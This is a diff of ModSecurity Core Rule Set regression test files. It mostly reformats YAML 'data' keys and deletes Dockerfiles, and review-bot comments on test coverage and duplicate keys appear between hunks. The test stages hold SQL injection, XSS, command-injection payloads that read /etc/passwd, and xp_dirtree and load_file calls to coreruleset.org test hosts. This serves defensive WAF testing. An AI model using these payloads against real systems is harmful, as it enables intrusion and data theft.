@@ -208,7 +208,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" version: HTTP/1.0 output: log_contains: id "941130" @@ -227,7 +227,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=Matched Data: %awfke;" + data: "var=Matched Data: %awfke;" version: HTTP/1.0 output: log_contains: id "941130" @@ -246,7 +246,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=oez" + data: "var=oez" version: HTTP/1.0 output: log_contains: id "941130" @@ -265,7 +265,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=(select extractvalue(xmltype('%anwyn;" + data: "var=(select extractvalue(xmltype('%anwyn;" version: HTTP/1.0 output: log_contains: id "941130" @@ -284,7 +284,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=" + data: "var=" version: HTTP/1.0 output: log_contains: id "941130" @@ -303,7 +303,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" version: HTTP/1.0 output: log_contains: id "941130" 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 6f154ba45..7ba9d6539 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -7,7 +7,7 @@ tests: - test_title: 941350-1 - desc: GH issue #1514 + desc: GH issue 1514 stages: - stage: diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index b3f3384ad..6da8602f9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -20,7 +20,7 @@ method: GET port: 80 uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' - # /login?user={{constructor.constructor('alert(1)')()}} + # /login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 8d47aec9e..7e8337545 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -18,7 +18,7 @@ method: POST port: 80 uri: "/" - data : "var=1234 OR 1=1" + data: "var=1234 OR 1=1" version: HTTP/1.0 output: log_contains: id "942100" @@ -35,7 +35,7 @@ method: POST port: 80 uri: "/" - data : "var=-1839' or '1'='1" + data: "var=-1839' or '1'='1" version: HTTP/1.0 output: log_contains: id "942100" @@ -52,7 +52,7 @@ method: POST port: 80 uri: "/" - data : "var=-1839\x22 or \x221\x22=\x222" + data: "var=-1839\x22 or \x221\x22=\x222" version: HTTP/1.0 output: log_contains: id "942100" 
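Review bot: Dropping the `#` from `desc: GH issue #1514` in the 941350.yaml hunk loses the conventional issue reference, when quoting would have kept it. The original value was silently truncated to `GH issue` because ` #` starts a YAML comment, and `desc: "GH issue #1514"` fixes that while preserving the text as written. The quoted form also does not trip a comment-spacing lint rule, which is presumably why the bare `#1514` was removed rather than quoted.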
@@ -69,7 +69,7 @@ method: POST port: 80 uri: "/" - data : "var=2010-01-01'+sleep(20.to_i)+'" + data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942100" @@ -86,7 +86,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue' and 526=527" + data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: log_contains: id "942100" @@ -103,7 +103,7 @@ method: POST port: 80 uri: "/" - data : "var=foo') UNION ALL select NULL --" + data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" @@ -120,7 +120,7 @@ method: POST port: 80 uri: "/" - data : "var=foo')waitfor%20delay'5%3a0%3a20'--" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942100" @@ -137,7 +137,7 @@ method: POST port: 80 uri: "/" - data : "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: log_contains: id "942100" @@ -154,7 +154,7 @@ method: POST port: 80 uri: "/" - data : "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" @@ -171,7 +171,7 @@ method: POST port: 80 uri: "/" - data : "1'||(select extractvalue(xmltype('%toyop;" + data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: log_contains: id "942100" @@ -188,7 +188,7 @@ method: POST port: 80 uri: "/" - data : "var=sleep(20)" + data: "var=sleep(20)" version: HTTP/1.0 output: log_contains: id "942100" @@ -205,7 +205,7 @@ method: POST port: 80 uri: "/" - data : "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" + data: "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" version: HTTP/1.0 output: log_contains: id "942100" 
@@ -222,7 +222,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" + data: "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" version: HTTP/1.0 output: log_contains: id "942100" @@ -239,7 +239,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" + data: "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 552f9c2f6..4c0722461 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -340,7 +340,7 @@ method: POST port: 80 uri: "/" - data: "pay= in ( Aa,- Ab-, andd Ac)" + data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index bf4e761f6..25c3e1069 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -18,7 +18,7 @@ method: POST port: 80 uri: "/" - data : "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -35,7 +35,7 @@ method: POST port: 80 uri: "/" - data : "var=1' and sleep(9) #" + data: "var=1' and sleep(9) #" version: HTTP/1.0 output: log_contains: id "942150" @@ -52,7 +52,7 @@ method: POST port: 80 uri: "/" - data : "var=1(select*from(select(sleep(5)))d)" + data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: log_contains: id "942150" 
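Review bot: The payload edit from `andd` to `and` in the 942120.yaml hunk changes the input this stage exercises without any change to the expected `log_contains`, and the same applies to `execute syste` → `execute system` in the 942380.yaml hunk further down. If the misspelled forms were deliberate probes of where the rule's pattern stops matching, correcting them drops that coverage; if they were typos, a `desc` on the test (outside the hunk) naming the token the stage targets would make the intent clear. The test entries containing these stages start before their hunks.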
@@ -69,7 +69,7 @@ method: POST port: 80 uri: "/" - data : "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: log_contains: id "942150" @@ -85,7 +85,7 @@ method: POST port: 80 uri: "/" - data : "var=test')and (select*from(select(sleep(10)))d)--" + data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -102,7 +102,7 @@ method: POST port: 80 uri: "/" - data : "var=foo'||(select extractvalue(xmltype('%tocob;" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: log_contains: id "942150" @@ -119,7 +119,7 @@ method: POST port: 80 uri: "/" - data : "var=config.ini' and sleep(91) #" + data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: log_contains: id "942150" @@ -136,7 +136,7 @@ method: POST port: 80 uri: "/" - data : "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" + data: "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" version: HTTP/1.0 output: log_contains: id "942150" @@ -153,7 +153,7 @@ method: POST port: 80 uri: "/" - data : "var=None')and (select*from(select(sleep(10)))a)--" + data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -170,7 +170,7 @@ method: POST port: 80 uri: "/" - data : "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" + data: "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" version: HTTP/1.0 output: log_contains: id "942150" 
@@ -187,7 +187,7 @@ method: POST port: 80 uri: "/" - data : "var=file:/init.ini'.sleep(12).'" + data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: log_contains: id "942150" @@ -204,7 +204,7 @@ method: POST port: 80 uri: "/" - data : "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -221,7 +221,7 @@ method: POST port: 80 uri: "/" - data : "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" + data: "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" version: HTTP/1.0 output: log_contains: id "942150" @@ -238,7 +238,7 @@ method: POST port: 80 uri: "/" - data : "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -255,7 +255,7 @@ method: POST port: 80 uri: "/" - data : "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: log_contains: id "942150" @@ -272,7 +272,7 @@ method: POST port: 80 uri: "/" - data : "var=test{${sleep(12)}}" + data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: log_contains: id "942150" 
@@ -289,7 +289,7 @@ method: POST port: 80 uri: "/" - data : "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" + data: "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -306,7 +306,7 @@ method: POST port: 80 uri: "/" - data : "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" + data: "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -323,7 +323,7 @@ method: POST port: 80 uri: "/" - data : "var=\x5cfoobar.txt\x22 or sleep(4) #" + data: "var=\x5cfoobar.txt\x22 or sleep(4) #" version: HTTP/1.0 output: log_contains: id "942150" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 32b1e10b5..0ccec158a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -36,6 +36,6 @@ port: 80 uri: "/" version: HTTP/1.0 - data : "javascript:\"/*'/*`/*-->%ptkjp;" + data: "var=abcd'||(select extractvalue(xmltype('%ptkjp;" version: HTTP/1.0 output: log_contains: id "942260" @@ -120,7 +120,7 @@ method: POST port: 80 uri: "/" - data : "var=` /bin/cat /etc/passwd`" + data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.0 output: log_contains: id "942260" @@ -137,7 +137,7 @@ method: POST port: 80 uri: "/" - data : "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: log_contains: id "942260" 
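Review bot: The `@@ -36,6 +36,6 @@` hunk of 942180.yaml keeps two `version: HTTP/1.0` entries in the same mapping, one before the rewritten `data:` line and one after it; duplicate keys are invalid YAML that most parsers resolve silently to the last value and that yamllint's key-duplicates check rejects, so the first `version: HTTP/1.0` line should be removed. The same hunk replaces the `javascript:...` probe with a SQL-style payload instead of adding it as a further stage, so the earlier input is no longer exercised; if that probe was meant to stay covered, keep it as its own test. The expected `id "942260"` inside a file named 942180.yaml is presumably intentional for these stages, but worth confirming given the file name. The enclosing test entry starts before the hunk.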
@@ -154,7 +154,7 @@ method: POST port: 80 uri: "/" - data : "var=`echo crs312``echo 34test`" + data: "var=`echo crs312``echo 34test`" version: HTTP/1.0 output: log_contains: id "942260" @@ -171,7 +171,7 @@ method: POST port: 80 uri: "/" - data : "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" + data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" version: HTTP/1.0 output: log_contains: id "942260" @@ -188,7 +188,7 @@ method: POST port: 80 uri: "/" - data : "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" + data: "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -205,7 +205,7 @@ method: POST port: 80 uri: "/" - data : "var=content.ini);declare @q varchar(99);set @q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" + data: "var=content.ini);declare @q varchar(99);set @q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -222,7 +222,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" + data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" 
@@ -239,7 +239,7 @@ method: POST port: 80 uri: "/" - data : "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" + data: "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -256,7 +256,7 @@ method: POST port: 80 uri: "/" - data : "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" + data: "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" version: HTTP/1.0 output: log_contains: id "942260" @@ -273,7 +273,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" + data: "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" version: HTTP/1.0 output: log_contains: id "942260" @@ -290,7 +290,7 @@ method: POST port: 80 uri: "/" - data : "var=test@coreruleset.org\x22|type %SYSTEMROOT%\x5cwin.ini" + data: "var=test@coreruleset.org\x22|type %SYSTEMROOT%\x5cwin.ini" version: HTTP/1.0 output: log_contains: id "942260" @@ -307,7 +307,7 @@ method: POST port: 80 uri: "/" - data : "var=mytest>'>\x22>" + data: "var=mytest>'>\x22>" version: HTTP/1.0 output: log_contains: id "942260" @@ -324,7 +324,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" + data: "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942260" 
@@ -341,7 +341,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" + data: "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" version: HTTP/1.0 output: log_contains: id "942260" @@ -358,7 +358,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22-->'-->`-->" + data: "var=\x22-->'-->`-->" version: HTTP/1.0 output: log_contains: id "942260" @@ -375,7 +375,7 @@ method: POST port: 80 uri: "/" - data : "var='\x22>" + data: "var='\x22>" version: HTTP/1.0 output: log_contains: id "942260" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index ba1f5224d..90c6e0dd6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -562,7 +562,7 @@ method: POST port: 80 uri: "/" - data: "execute syste" + data: "execute system" version: HTTP/1.0 output: log_contains: id "942380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 17e5dd478..dc6f8b956 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -175,4 +175,3 @@ version: HTTP/1.0 output: log_contains: id "942470" - diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index cdcf3de4e..28f5baca0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -41,4 +41,3 @@ version: HTTP/1.0 output: log_contains: "id \"942480" - 
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index f3869a577..bd74d0a22 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -32,4 +32,3 @@ encoded_request: "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" output: log_contains: "id \"944200\"" - diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 08b9b5dcc..b0dc08db3 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -101,4 +101,4 @@ print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) o.close() -#print('\nGenerated %s tests' % (str(skeletontest))) \ No newline at end of file +#print('\nGenerated %s tests' % (str(skeletontest))) diff --git a/tests/regression/utils/testSampling.py b/tests/regression/utils/testSampling.py index 58ac53f4c..e7e1223a4 100644 --- a/tests/regression/utils/testSampling.py +++ b/tests/regression/utils/testSampling.py @@ -43,4 +43,4 @@ def run_requests(iterations): def test_sampling(): print "running" block,passed = run_requests(100) - assert block < 55 and block > 45 \ No newline at end of file + assert block < 55 and block > 45 diff --git a/util/av-scanning/runAV/common.c b/util/av-scanning/runAV/common.c index 763c58ad0..e7ba76069 100755 --- a/util/av-scanning/runAV/common.c +++ b/util/av-scanning/runAV/common.c @@ -650,4 +650,3 @@ int init_cgi() return 0; } - diff --git a/util/browser-tools/js-overrides.js b/util/browser-tools/js-overrides.js index 66d7b464f..34d501779 100644 --- a/util/browser-tools/js-overrides.js +++ b/util/browser-tools/js-overrides.js 
@@ -75,4 +75,4 @@ XSSTripwire.proxy(document, 'write', 'document.write', true); XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); -})(); \ No newline at end of file +})(); diff --git a/util/docker/Dockerfile b/util/docker/Dockerfile deleted file mode 100644 index ab713700e..000000000 --- a/util/docker/Dockerfile +++ /dev/null @@ -1,32 +0,0 @@ -FROM owasp/modsecurity:2.9-apache-ubuntu -MAINTAINER Chaim Sanders chaim.sanders@gmail.com - -ARG COMMIT=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 - -RUN cd /opt && \ - git clone https://github.com/${REPO}.git owasp-modsecurity-crs-3.2 && \ - cd owasp-modsecurity-crs-3.2 && \ - git checkout -qf ${COMMIT} - -RUN cd /opt && \ - cp -R /opt/owasp-modsecurity-crs-3.2/ /etc/apache2/modsecurity.d/owasp-crs/ && \ - mv /etc/apache2/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/apache2/modsecurity.d/owasp-crs/crs-setup.conf && \ - cd /etc/apache2/modsecurity.d && \ - printf "include modsecurity.d/owasp-crs/crs-setup.conf\ninclude modsecurity.d/owasp-crs/rules/*.conf" > include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/apache2/modsecurity.d/modsecurity.conf && \ - a2enmod proxy proxy_http - -COPY proxy.conf /etc/apache2/modsecurity.d/proxy.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-2.9-apache b/util/docker/Dockerfile-2.9-apache deleted file mode 100644 index 7230da894..000000000 --- a/util/docker/Dockerfile-2.9-apache +++ /dev/null 
@@ -1,33 +0,0 @@ -FROM owasp/modsecurity:2.9-apache -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Apache -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf - -COPY httpd-logging-before-modsec.conf /usr/local/apache2/conf/extra/httpd-logging-before-modsec.conf -COPY httpd-logging-after-modsec.conf /usr/local/apache2/conf/extra/httpd-logging-after-modsec.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 -EXPOSE 443 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-3.0-apache b/util/docker/Dockerfile-3.0-apache deleted file mode 100644 index 883f4a11f..000000000 --- a/util/docker/Dockerfile-3.0-apache +++ /dev/null 
@@ -1,33 +0,0 @@ -FROM owasp/modsecurity:3.0-apache -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Apache -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf && \ - mkdir /var/log/apache2/ && \ - sed -i 's|ErrorLog\s.*$|ErrorLog /var/log/apache2/error.log|g' /usr/local/apache2/conf/httpd.conf - -COPY proxy.conf /etc/modsecurity.d/proxy.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-3.0-nginx b/util/docker/Dockerfile-3.0-nginx deleted file mode 100644 index 5d2a15851..000000000 --- a/util/docker/Dockerfile-3.0-nginx +++ /dev/null 
@@ -1,30 +0,0 @@ -FROM owasp/modsecurity:3.0-nginx -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Nginx -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf - -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["nginx", "-g", 